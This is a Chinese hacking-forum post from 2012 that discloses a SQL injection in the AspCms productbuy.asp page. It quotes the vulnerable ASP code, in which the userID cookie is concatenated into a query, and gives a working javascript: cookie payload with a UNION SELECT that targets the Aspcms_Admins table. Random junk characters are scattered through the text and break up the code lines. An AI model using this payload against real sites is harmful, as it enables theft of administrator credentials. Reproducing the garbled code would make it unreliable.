好久没上土司了,上来一看发现在删号名单内.....
, \1 \9 i Y; b% g1 q; U也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。" J+ K+ m0 |1 M! p+ {: n
废话不多说,看代码:3 w# ]4 l1 G4 I: n9 @6 r
- S( O, d- [; q H, Y
<%
' }% k" ~' O3 r2 s- m$ L9 l( N' R/ Q7 h3 y/ L" b5 L$ i- B6 \
if action = "buy" then
i2 _2 m! s% t+ W! ~' n% d! ?* R2 t& U: `$ a0 F
addOrder() {7 @% y( a* K1 A8 w* J
7 }9 s- Z7 V! S7 felse
. A+ k) _; a$ s. n7 I# o# W1 I
5 y+ P4 U6 g ?1 {5 u; p" @7 E echoContent()
( h# j" ]* m. D2 L. m# l: Z0 O/ u# i7 z8 ~% P
end if
( H# B1 z; Z9 c
/ M4 t* [5 v+ ^2 a; g& V4 H: L. b) S$ P- w( B% L
* S) q4 g+ Q j
……略过
7 o# ]9 J7 e+ b+ {4 W @6 S5 ?# K; `2 T4 c/ v8 l6 n& ~
1 |8 D3 E$ V1 g O; C$ v
: I9 d! q& W# B& r) N0 K
Sub echoContent()
5 Q) Z6 B) N& E V
! d/ Q. ], K M$ { dim id
* {. ` Z* c7 w2 \' b# A. ^; \6 _/ D; r8 ]. B4 x
id=getForm("id","get")
B2 I0 g1 b5 l& d4 K8 B* }. @" d+ ]% k
5 h. M, ~* P( s0 a Z# B: G. h
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" % F, Q: x# W' O; q# s+ D
$ F( s# w" _7 ^9 }1 @. M
& j7 ? _- I" H7 @9 o
# D( }. @+ K( E5 ?0 c# H8 d
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")* ^& ~ @. \. C. R( z
- p* I, ^8 M- g
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
; Q, B) l: L2 P/ k C3 ~$ Z( |4 z0 P' x* T( b# w D
Dim templatePath,tempStr
# Q# M. m- j& k; t2 c- i: x1 B% I7 w" ^
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
/ H: a& C: L$ H2 c6 p4 R2 o o2 c, l3 G' G3 k$ f
+ @: z( R2 `1 [- }* q# [# u7 F( p2 ?
5 }9 } T7 a$ i0 c& M set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1"). k2 T2 i" J; r; {+ ]
% [- L- C% N, H selectproduct=rsObj(0)+ A. u4 x7 U+ N. P3 E' Q
9 a( f4 H$ i" \- }7 S; N9 ] 8 `: Y0 ?, Z: D2 I9 X3 E0 o0 P( I4 @
- C. O% G) q m8 O' p
Dim linkman,gender,phone,mobile,email,qq,address,postcode k2 e `, c& t4 I
6 O W! u: h# D1 W$ L) v if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0# b5 l! J! V, i Y2 z% x7 S
# a" X. g0 @9 Q# g. P
if rCookie("loginstatus")=1 then
6 ~1 A, t/ J F5 |; g; Q6 O6 s3 U4 J k% q
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")4 y1 M* ]" c) L' L
3 K1 z& C; p2 Y% O5 `
linkman=rsObj("truename")
" V. C# f" s, G- Q2 s' p
! k* }+ i, t5 B7 O9 |+ Q gender=rsObj("gender")2 p( l3 a( r0 X" h
9 h9 m& u8 R6 A phone=rsObj("phone"), [8 h/ s4 E1 s# \
/ e1 b3 c4 M* l0 d- y
mobile=rsObj("mobile"), @. ^3 F" n4 J( R& T+ C
/ c% x8 I% Y" s0 J) y1 t7 V
email=rsObj("email")# X: e! Q B4 I% G- n$ t7 e! o
& G9 N) w9 @# P6 r& v3 F+ M
qq=rsObj("qq")
2 _1 N/ u" j& j! |8 P4 h; K8 L. I% q9 ^7 H
address=rsObj("address")- s2 J: F: L5 S/ n# w( u) l& P
7 I7 {: X, x4 O7 u s9 [ postcode=rsObj("postcode")4 r6 B8 c& J# q; ]' |. q
4 h4 c# f/ q8 h; {3 A( e4 h
else
& J( z9 P& \; V) W, g; b, i& \ o& T a( J
gender=1
% z0 T4 p& j7 M: M% z: F! t, G
# M( Z) r! [" k9 q# g& M( } end if. }+ U7 r2 g; V* Z- j& W
$ _! f# I. {+ z) S: u" h rsObj.close()
' h _3 T2 z7 }+ s* y. o1 i7 p2 b
' e1 l1 A9 m* w! g
9 P0 q: X3 t/ |1 u- Q8 U with templateObj
. S3 e4 H; Z% w/ @; T4 M
4 O9 X i) v0 @ .content=loadFile(templatePath)
& ~% B0 X G3 d0 P% t
3 g) t; [+ b) f/ K l2 { .parseHtml()
. J- e4 _" n4 Q# [% R
9 O6 _! D ~/ z" J9 ]( ]0 j1 Z .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
- W0 f7 C6 a3 n- {% z7 [0 e4 o9 p/ }* t
.content=replaceStr(.content,"[aspcms:linkman]",linkman) 8 G( I" ?0 B8 ] E( K
4 L5 B5 j; n5 T
.content=replaceStr(.content,"[aspcms:gender]",gender)
; P- v7 S$ T( O
1 O" C' v- |: Y0 s- o9 y8 U .content=replaceStr(.content,"[aspcms:phone]",phone)
4 I6 D# u( H, ]- R6 w7 |" i, A* x( B+ A$ z8 k
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
4 c4 K6 P# U5 b( r1 n! o& U, O1 j/ }- a& ~
.content=replaceStr(.content,"[aspcms:email]",email) & a* Y7 U/ |& j' m: |0 \9 a
, D1 \) U, E6 m; p1 S& | .content=replaceStr(.content,"[aspcms:qq]",qq)
: r, g* }$ \$ Q: K- J. j
) g! z) s3 ]/ ^ .content=replaceStr(.content,"[aspcms:address]",address)
1 t, m0 X- ~+ Y; U. b0 G N! o/ u! N0 h9 n2 E
.content=replaceStr(.content,"[aspcms:postcode]",postcode) 7 l/ d7 @7 Q& f" K
" Z4 |9 w0 m6 x
.parseCommon()
& s+ Z; F' _& X+ ~# l/ ?( W. O! a4 G# {
echo .content & a7 X- n5 C" X3 ^ c# |2 x9 m C
. z+ @7 |' p9 h% x9 q end with7 O) T9 x0 z; @: p4 ?
1 }, Y4 O4 u! q( k) V
set templateobj =nothing : terminateAllObjects7 R- }- y2 X5 O- f
* z8 n# F- m# E# FEnd Sub! `7 j" J. s! h) X2 C y' Q
漏洞很明显,没啥好说的) p0 Y2 u: v+ h# _/ V* X8 ^
poc:
# H) p3 e N( N- X6 [7 s# @& w9 |( B' |& V4 Q# f( \) ~8 k
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
' F+ F; ?2 V8 f5 ]4 N/ u2 W
! t* s! P! b0 v' I' I |
发表于 2012-12-27 08:35:05
收藏
支持
反对